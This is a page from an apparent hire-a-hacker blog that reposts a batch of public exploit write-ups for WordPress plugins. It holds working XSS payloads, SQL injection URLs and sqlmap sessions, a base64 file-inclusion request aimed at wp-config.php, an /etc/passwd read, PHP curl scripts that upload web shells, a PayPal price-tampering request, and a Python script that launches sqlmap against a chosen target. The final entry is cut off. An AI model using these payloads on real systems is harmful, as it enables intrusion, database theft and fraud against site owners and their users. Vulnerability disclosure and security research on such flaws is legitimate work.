Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863134127

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/54332/info

PHPFreeChat is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PHPFreeChat 0.2.8 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/56478/info

The PHP Event Calendar plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/wp-content/plugins/Calendar-Script/load-events.php?cid=1[SQL]
HireHackking 
source: https://www.securityfocus.com/bid/46782/info

The PhotoSmash Galleries WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PhotoSmash Galleries WordPress Plugin 1.0.1 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-content/plugins/photosmash-galleries/index.php?action=%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/64173/info

The PhotoSmash Galleries plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

<?php
$uploadfile="file.php";
$ch = curl_init("
http://www.example.com/wordpress/wp-content/plugins/photosmash-galleries/bwbps-uploader.php
");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('FileData'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
HireHackking 
# Exploit Title: Wordpress Plugin Photocart Link - Local File Inclusion
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-03-27
# Google Dork : inurl:/wp-content/plugins/photocart-link/
# Vendor Homepage: https://fr.wordpress.org/plugins/photocart-link/
# Tested on: MSWin32
# Version: 1.6

# Vuln file : decode.php

<?php
error_reporting(0);
header("Cache-control: private"); 
$new =  base64_decode($_REQUEST['id']);
header("Content-type: image/jpeg");
header("Content-transfer-encoding: binary\n"); 
header("Content-Disposition: filename=do_not_copy_these_images");
header('Cache-control: no-cache');
@readfile($new);
?>

# PoC : /wp-content/plugins/photocart-link/decode.php?id=Li4vLi4vLi4vd3AtY29uZmlnLnBocA==

# Right click -> Save As -> and Read with Notepad file Saved

# 27/03/2016 - Vendor Informed about Issues
HireHackking 
# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Blind SQL injection
# inurl:"\wp-content\plugins\photo-gallery"
# Date: 09-10-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://10web.io/
# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
# Version: Up to v1.5.34
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows - SQLMap
# CVE : 2019-16119

# Software description:
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.


# Technical Details & Impact:
Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data from the database, even delete database or data from
them.

# POC
In Gallery Group tab > Add new and in add galleries / Gallery groups. GET request going with parameter album_id is vulnerable to Time Based Blind SQL injection.  Following is the POC,

1.   http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=<SQLi+HERE>&width=785&height=550&bwg_nonce=9e367490cc&

2.    http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc&


# Timeline
09-01-2019 - Vulnerability Reported
09-03-2019 - Vendor responded
09-04-2019 - New version released (1.5.35)
09-10-2019 - Full Disclosure

# References:
https://wordpress.org/plugins/photo-gallery/#developers
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Albumsgalleries.php?old=1845136&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FAlbumsgalleries.php
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119
HireHackking 
# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting
# inurl:"\wp-content\plugins\photo-gallery"
# Date: 09-10-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://10web.io/
# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
# Version: Up to v1.5.34
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows
# CVE : 2019-16118

# Software description:
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.


# Technical Details & Impact:
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.


# POC

1.    Go to options tab select watermark tab 
2.    Select text as watermark type
3.    Add watermark text as XSS payload e.g;
"'><img src=a onerror='alert(2);'
4.    Click Save.
5.    It will show pop-up confirming existence of XSS vulnerability

# Timeline
09-01-2019 - Vulnerability Reported
09-03-2019 - Vendor responded
09-04-2019 - New version released (1.5.35)
09-10-2019 - Full Disclosure

# References:
https://wordpress.org/plugins/photo-gallery/#developers
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Options.php?old=2142624&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FOptions.php
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/js/bwg.js?old=2135029&old_path=photo-gallery%2Ftrunk%2Fjs%2Fbwg.js
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16118
HireHackking 
# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting
# inurl:"\wp-content\plugins\photo-gallery"
# Date: 09-10-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://10web.io/
# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
# Version: Up to v1.5.34
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows
# CVE : 2019-16117

# Software description:
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.


# Technical Details & Impact:
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.


# POC

1.    In Add Gallery/Images tab 
2.    Edit current image gallery
3.    In Alt/Title or Description text area add XSS payload e.g;
<script>alert(1);</script>

4.    Click Save and preview.
5.    It will show pop-up confirming existence of XSS vulnerability 

# Timeline
09-01-2019 - Vulnerability Reported
09-03-2019 - Vendor responded
09-04-2019 - New version released (1.5.35)
09-10-2019 - Full Disclosure

# References:
https://wordpress.org/plugins/photo-gallery/#developers
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/models/Galleries.php?old=2135029&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fmodels%2FGalleries.php
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16117
HireHackking 
# Exploit Title: Photo Gallery 1.2.5 Unrestricted File Upload
# Date: 11-11-2014
# Software Link: https://wordpress.org/plugins/photo-gallery/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9312
# Category: webapps

1. Description
  
Every registered user (even Subscriber) can access upload functionality because of read role used inside UploadHandler.php

http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html
  
2. Proof of Concept

Login as regular user (created using wp-login.php?action=register).

Pack .php files into .zip archive then send it using:

<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data">
    <input type="file" name="files">
    <input type="submit" value="Hack!">
</form>

Your files will be visible inside:

http://wordpress-install/wp-admin/rce/
  
3. Solution:
  
Update to version 1.2.6
https://downloads.wordpress.org/plugin/photo-gallery.1.2.6.zip
HireHackking 
# Exploit Title: Wordpress Plugin Peugeot Music - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/peugeot-music-plugin/
# Date: 2018-05-23
# Exploit Author: Mr.7z
# Vendor Homepage: -
# Software Link: -
# Version: 1.0
# Tested on: Windows 10 64bit (Home Edition)

# Exploit: /wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php
# Vuln? {"jsonrpc" : "2.0", "result" : null, "id" : "id"}

# CSRF
<?php

$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php";
// put URL Here
$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1;
rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;

?>

# For CSRF using php xampp.
# Shell Locate:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php

# Thanks To XaiSyndicate - Family Attack Cyber - HunterSec-Team -
# Typical Idiot Security [!]
HireHackking 
# Exploit Title: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)
# Date 18.02.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.getperfectsurvey.com/
# Software Link: https://web.archive.org/web/20210817031040/https://downloads.wordpress.org/plugin/perfect-survey.1.5.1.zip
# Version: < 1.5.2
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-24762
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md

'''
Description:
The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before
using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
'''

banner = '''
                                                                                                      
   ___    _     _  ______         ____   ____     ____   ___           ____  _    _  _______  _____    ____  
 _(___)_ (_)   (_)(______)      _(____) (____)  _(____) (___)        _(____)(_)  (_)(_______)(_____) _(____) 
(_)   (_)(_)   (_)(_)__  ______(_) _(_)(_)  (_)(_) _(_)(_)(_) ______(_) _(_)(_)__(_)_   _(_)(_)___  (_) _(_) 
(_)    _ (_)   (_)(____)(______) _(_)  (_)  (_)  _(_)     (_)(______) _(_)  (________)_(_)  (_____)_  _(_)   
(_)___(_) (_)_(_) (_)____       (_)___ (_)__(_) (_)___    (_)        (_)___      (_) (_)    (_)___(_)(_)___  
  (___)    (___)  (______)     (______) (____) (______)   (_)       (______)     (_)(_)      (_____)(______) 
                                                                                                             
                                                                                                             
								[+] Perfect Survey - SQL Injection
								[@] Developed by Ron Jost (Hacker5preme)

'''
print(banner)

import argparse
from datetime import datetime
import os

# User-Input:
my_parser = argparse.ArgumentParser(description= 'Perfect Survey - SQL-Injection (unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH

print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('[*] Payload for SQL-Injection:')
exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=get_question&question_id=1 *" '
print('    Sqlmap options:')
print('     -a, --all           Retrieve everything')
print('     -b, --banner        Retrieve DBMS banner')
print('     --current-user      Retrieve DBMS current user')
print('     --current-db        Retrieve DBMS current database')
print('     --passwords         Enumerate DBMS users password hashes')
print('     --tables            Enumerate DBMS database tables')
print('     --columns           Enumerate DBMS database table column')
print('     --schema            Enumerate DBMS schema')
print('     --dump              Dump DBMS database table entries')
print('     --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url +  retrieve_mode + ' --answers="follow=Y" --batch -v 0'
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
HireHackking 
source: https://www.securityfocus.com/bid/53519/info

PDF & Print Button Joliprint plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

PDF & Print Button Joliprint 1.3.0 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/options-general.php?page=joliprint/joliprint_admin_options.php&amp;opt=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

http://www.example.com/wp-content/plugins/joliprint/joliprint_options_upload.php?type=%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
HireHackking 
# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link:
https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
 Description:
 proxy.php's code:
 <?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a file is printed out (unfortunately
not included) so any html file can be loaded, and an attacker may be able
to read  any local file which
is not executed in the server.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
HireHackking 
# Exploit Title: cgi-bin/webscr?cmd=_cart in the WooCommerce PayPal Checkout Payment Gateway plugin 1.6.8 for WordPress allows Parameter Tampering in an amount parameter (such as amount_1), as demonstrated by purchasing an item for lower than the intended price
# Date: 27.01.2019
# Product Title :Woocommerce Paypal gateway Plugin
# Vendor Homepage: https://wordpress.org
# Software Link  : https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
# Category: Web Applications Plugin (Wordpress)
# Version: 1.6.8
# Active installations: 700,000+
# Exploit Author: Vikas Chaudhary
# Contact: https://gkaim.com/contact-us/
# Web:  https://gkaim.com/
# Tested on: Windows 10 -Firefox .
# CVE-2019-7441
*****************************************************
## VENDOR  SUMMARY :-  This is a PayPal Checkout Payment Gateway for WooCommerce.
PayPal Checkout allows you to securely sell your products and subscriptions online using In-Context Checkout to help you meet security requirements without causing your theme to suffer. In-Context Checkout uses a modal window, hosted on PayPalís servers, that overlays the checkout form and provides a secure means for your customers to enter their account information

## Vulnerability Description => The Web Parameter Tampering attack is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. Usually, this information is stored in cookies, hidden form fields, or URL Query Strings, and is used to increase application functionality and control.
This attack can be performed by a malicious user who wants to exploit the application for their own benefit, or an attacker who wishes to attack a third-person using a Man-in-the-middle attack. In both cases, tools likes Webscarab and Paros proxy are mostly used. 
__________________________________
Proof Of Concept:- PoC
1 -Install Woocommerce Paypal checkout gateway plugin (1.6.8) in Remote.
2- Now fix a price of any product  and configure it with this plguin.
3- Do checkout through paypal and capture the data from burp.
5- Here you will find post based request with amount parameter- Now Edit amount parameter as you want and forward it .
6- You will see a new price and you can purchase that product on your new edited price.
-------------------
Post REQUEST:-
GET /cgi-bin/webscr?cmd=_cart&business=gkaim100%40gmail.com&no_note=1&currency_code=INR&charset=utf-8&rm=2&upload=1&return=https%3A%2F%2Fa2zcourse.com%2Fcheckout%2Forder-received%2F798%2F%3Fkey%3Dwc_order_wJp0p80pFSg8V%26utm_nooverride%3D1&cancel_return=https%3A%2F%2Fa2zcourse.com%2Fbasket%2F%3Fcancel_order%3Dtrue%26order%3Dwc_order_wJp0p80pFSg8V%26order_id%3D798%26redirect%26_wpnonce%3D68f71663cb&page_style=A2Zcourse.com&image_url=&paymentaction=sale&bn=WooThemes_Cart&invoice=A2Z-798&custom=%7B%22order_id%22%3A798%2C%22order_key%22%3A%22wc_order_wJp0p80pFSg8V%22%7D&notify_url=https%3A%2F%2Fa2zcourse.com%2Fwc-api%2FWC_Gateway_Paypal%2F&first_name=dfkjk&last_name=v%3Blbkm&address1=&address2=&city=&state=&zip=&country=&email=sdflmnvkj%40xncv.com&night_phone_b=8908098090&no_shipping=1&tax_cart=0.00&item_name_1=Artificial+Intelligence+2018+Build+the+Most+Powerful+AI&quantity_1=1&amount_1=5000&item_number_1=Artificial+Intelligence+2018 HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://a2zcourse.com/checkout/
Connection: close
Upgrade-Insecure-Requests: 1
----------------
Post RESPONSE:--
HTTP/1.1 302 Moved Temporarily
Server: Apache
X-Recruiting: If you are reading this, maybe you should be working at PayPal instead! Check out https://www.paypal.com/us/webapps/mpp/paypal-jobs
Paypal-Debug-Id: 2f8e90a8c5e72
Cache-Control: no-cache
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-frame-options: SAMEORIGIN
content-security-policy: default-src 'self' https://*.paypal.com; script-src 'nonce-iJYgKZYXXhHUAluelfhZan+dO96W5x49hsgMXR3ZPHDRR/SI' 'self' https://*.paypal.com 'unsafe-inline' 'unsafe-eval'; img-src https://*.paypalobjects.com; object-src 'none'; font-src 'self' https://*.paypalobjects.com; form-action 'self' https://*.paypal.com; base-uri 'self' https://*.paypal.com; block-all-mixed-content; report-uri https://www.paypal.com/csplog/api/log/csp
HTTP_X_PP_AZ_LOCATOR: dcg13.slc
Paypal-Debug-Id: 2f8e90a8c5e72
Location: https://www.paypal.com/webapps/hermes?token=13V78288LV2795452&useraction=commit&rm=2&mfid=1548578790132_2f8e90a8c5e72
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
DC: ccg11-origin-www-1.paypal.com
Content-Length: 302
X-EdgeConnect-MidMile-RTT: 219
X-EdgeConnect-Origin-MEX-Latency: 801
Date: Sun, 27 Jan 2019 08:46:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: tsrce=xorouternodeweb; Domain=.paypal.com; Path=/; Expires=Wed, 30 Jan 2019 08:46:30 GMT; HttpOnly; Secure
Set-Cookie: ts=vr%3D8e7d19d1168ac1200012cd39fff5bb0f%26vreXpYrS%3D1643249566%26vteXpYrS%3D1548580589%26vt%3D8e7d19d4168ac1200012cd39fff5bb0e; Domain=.paypal.com; Path=/; Expires=Thu, 27 Jan 2022 02:12:47 GMT; HttpOnly; Secure
Set-Cookie: nsid=s%3AU8TmrvBUulZLtqFmT9F1ZeoVNf4dKoAr.slyvmBwJFEJx4Uxt4mNU%2BJH%2BrDf5uxLrKECnBRm%2FQ0I; Path=/; HttpOnly; Secure
Set-Cookie: X-PP-SILOVER=name%3DLIVE5.WEB.1%26silo_version%3D880%26app%3Dxorouternodewebxclick%26TIME%3D3849276764%26HTTP_X_PP_AZ_LOCATOR%3Ddcg13.slc; Expires=Sun, 27 Jan 2019 09:16:30 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: X-PP-SILOVER=; Expires=Thu, 01 Jan 1970 00:00:01 GMT
Set-Cookie: AKDC=ccg11-origin-www-1.paypal.com; expires=Sun, 27-Jan-2019 09:16:30 GMT; path=/; secure
Set-Cookie: akavpau_ppsd=1548579390~id=8b5783ec5a9b02390092591f951f54f8; Domain=www.paypal.com; Path=/; Secure; HttpOnly
Strict-Transport-Security: max-age=63072000

<p>Found. Redirecting to <a href="https://www.paypal.com/webapps/hermes?token=13V78288LV2795452&useraction=commit&rm=2&mfid=1548578790132_2f8e90a8c5e72">https://www.paypal.com/webapps/hermes?token=13V78288LV2795452&useraction=commit&rm=2&mfid=1548578790132_2f8e90a8c5e72</a></p>

---------------------------------------------------------

___________________________________
HireHackking 
# Exploit Title: WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection
# Date: 29/08/2021
# Exploit Author: Niraj Mahajan
# Software Link: https://wordpress.org/plugins/invoicing/
# Version: 2.4.6
# Tested on Windows

*Steps to Reproduce:*
1. Install Wordpress 5.8
2. Install and Activate "WordPress Payments Plugin | GetPaid" Version 2.4.6
3. Navigate to GetPaid > Payment Forms
4. Click on "Add New" in the Payment Form page
5. Add a title and Click on Billing Email
6. You can see the "Help Text" field on the left hand side.
7. Add the below HTML code into the "Help Text" Field.
<img src="
https://www.pandasecurity.com/en/mediacenter/src/uploads/2019/07/pandasecurity-How-do-hackers-pick-their-targets.jpg"
height="200px" width="200px">
8. You will observe that the HTML code has successfully got stored into the database and executed successfully and we are getting an Image at the right hand side.
HireHackking 
# Exploit Title: Wordpress Plugin Participants Database < 1.7.5.10 - XSS
# Google Dork: inurl:wp-content/plugins/participants-database/
# Date: 01-Sep-17
# Exploit Author: Benjamin Lim
# Vendor Homepage: https://xnau.com/
# Software Link: https://wordpress.org/plugins/participants-database/
# Version: 1.7.5.9
# Tested on: Kali Linux 2.0
# CVE : CVE-2017-14126


1. Product & Service Introduction:
==================================
Participants Database is a Wordpress plugin for managing a database of
participants, members or volunteers. As of now, the plugin has been
downloaded 320,000 times and has 10,000+ active installs.


2. Technical Details & Description:
===================================
Cross site scripting (XSS) vulnerability in the Wordpress Participants
Database plugin 1.7.59 allows attackers to inject arbitrary javascript via
the Name parameter.
The XSS vulnerability is found on the participant signup form input
textfield. The get_field_value_display() function in
PDb_FormElement.class.php did not escape HTML special characters, allowing
an attacker to input javascript. The XSS code will be executed on 2 pages.

1) The "Thank you for signing up" page immediately after submitting the
form.
2) The page which is configured to output the list of participants with the
[pdb_list] shortcode.


3. Proof of Concept (PoC):
==========================

curl -k -F action=signup -F subsource=participants-database -F
shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2
-F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F
first_name=<script>alert("1");</script> -F last_name=a -F email=a@a.com -F
mailing_list=No -F submit_button=Submit http://localhost/?page_id=1

To trigger manually, browse to the page, input the following in the form
and click Sign Up.

First Name: <script>alert("1");</script>
Last Name: test
Email: test@test.com


4. Mitigation
=============
Update to version 1.7.5.10


5. Disclosure Timeline
======================
2017/09/01 Vendor contacted
2017/09/02 Vendor responded
2017/09/03 Update released
2017/09/06 Advisory released to the public


6. Credits & Authors:
=====================
Benjamin Lim - [https://limbenjamin.com]

--
*Benjamin Lim*
E: mail@limbenjamin.com
PGP : https://limbenjamin.com/pgp
HireHackking 
source: https://www.securityfocus.com/bid/54039/info

The Organizer plugin for WordPress is prone to the following security vulnerabilities:

1. A cross-site scripting vulnerability.
2. An information-disclosure vulnerability.
3. A directory-traversal vulnerability.

Attackers may leverage these issues to steal cookie-based authentication credentials, execute arbitrary script code in the browser, or disclose sensitive information; other attacks are also possible.

Organizer 1.2.1 is vulnerable; other versions may also be affected. 

Directory-traversal vulnerability:

http://www.example.com/wp-admin/wp-admin/admin.php?page=organizer/page/view.php

Cross-site scripting vulnerability:

http://www.example.com/wp-admin/admin.php?page=organizer/page/dir.php
"><script>alert(document.cookie)</script>

Information-disclosure vulnerability:

http://www.example.com/wp-admin/admin.php?page=organizer/page/users.php
HireHackking 
# Exploit Title: WordPress Plugin Order Export Import for WooCommerce
# Link: https://wordpress.org/plugins/order-import-export-for-woocommerce/
# Version: 1.0.8
# Date: 19th 2016
# Exploit Author: contact ([a]) david-peltier ([d]) fr
# Vendor Homepage: xadapter.com
# Version: 1.0.8
# Timeline: Vuln found: 17-09-2016, reported to vendor: 18-09-2016, fix: 19-09-2016


### SUMMARY

WooCommerce Order Export Import Plugin helps you to easily export and import orders in your store.
This attacks allows an attacker to export all order without being authenticated

### POC

http://server/wp-admin/admin.php?page=wf_woocommerce_order_im_ex&action=export
A .CSV with all orders will be downloaded

### FIX

The vendor fix this issue in 1.0.9
HireHackking 
# # # # # 
# Exploit Title: Online Hotel Booking System Pro v1.0 (WordPress Plugin) - SQL Injection
# Google Dork: N/A
# Date: 27.01.2017
# Vendor Homepage: http://www.bestsoftinc.com/
# Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro-wordpress-plugin/9338914
# Demo: http://envato.bestsoftinc.net/wp-hotel-pro/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PLUGIN_PATH]/front/roomtype-details.php?tid=[SQL]
# E.t.c
# # # # #
HireHackking 
# Exploit Title: Olimometer Plugin for WordPress – Sql Injection
# Date: 14/11/2016
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/olimometer/
# Software Link: https://wordpress.org/plugins/olimometer/
# Contact: info[at]tad.group
# Website: https://tad.group
# Category: Web Application Exploits
# Tested on: Debian 8


1 - Description

# Vulnerable parameter: olimometer_id=

Parameter: olimometer_id (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: olimometer_id=1 AND 6227=6227

     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind
     Payload: olimometer_id=1 AND SLEEP(5)

Using GET SQL Method with the "olimometer_id" parameter, we were able to
get the database name from the EXAMPLE.COM website . By further running
SQL Map using different arguments, we would be able to get the complete
database, including usernames and passwords if there are such.

2. Proof of Concept

Using the website EXAMPLE.COM for example, we can fire up sqlmap and set
the full path to the vulnerable parameter:

root@kali:~# sqlmap -u
http://EXAMPLE.COM/wp-content/plugins/olimometer/thermometer.php?olimometer_
id=1
--dbs --threads=5 --random-agent --no-cast

---
Parameter: olimometer_id (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: olimometer_id=1 AND 6227=6227

     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind
     Payload: olimometer_id=1 AND SLEEP(5)
---
[11:14:21] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[11:14:21] [INFO] fetching database names
[11:14:21] [INFO] fetching number of databases
[11:14:21] [INFO] retrieved:
[11:14:21] [WARNING] multi-threading is considered unsafe in time-based
data retrieval. Going to switch it off automatically
[11:14:21] [WARNING] (case) time-based comparison requires larger
statistical model, please wait.............................. (done)
[11:14:26] [WARNING] it is very important to not stress the network
adapter during usage of time-based payloads to prevent potential disruptions
[11:14:26] [ERROR] unable to retrieve the number of databases
[11:14:26] [INFO] falling back to current database
[11:14:26] [INFO] fetching current database
[11:14:26] [INFO] retrieving the length of query output
[11:14:26] [INFO] retrieved:
[11:14:28] [INFO] heuristics detected web page charset 'ascii'
14
[11:15:26] [INFO] retrieved: *****_wrdp1
available databases [1]:
[*] *****_wrdp1

We can see that we have successfully discovered one available database
with the name: "*****_wrdp1"

3. Type of vulnerability:

An SQL Injection vulnerability in Olimometer allows attackers to read
arbitrary data from the database.

4. Exploitation vector:

The url parameter 'olimometer_id=' of the
/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1 is
vulnerable to SQLI.

5. Attack outcome:

An attacker can read arbitrary data from the database. If the webserver
is misconfigured, read & write access the filesystem may be possible.

6. Impact:

Critical

7. Software/Product name:

Olimometer Plugin for WordPress

8. Affected versions:

<= 2.56

9. Fixed in version:

Not fixed at the date of submitting that exploit.

10. Vendor:

oshingler

11. CVE number:

Not existing
HireHackking 
========
Ocim MP3 Plugin SQL Injection Vulnerability
========

:----------------------------------------------------------------------------------------------------:
: # Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability
: # Date : 26 February 2016
: # Author : xevil and Blankon33
: # Vendor Site: http://www.ocimscripts.com/
: # Version:
: # Vulnerability : SQL Injection
: # Tested on : Wordpress 4.4.2
: # Severity : High
:----------------------------------------------------------------------------------------------------:

Summary
========
Ocim MP3 is Plugin to make MP3 Grabber site based on Wordpress.

Proof of Concept
========
Infected URL:
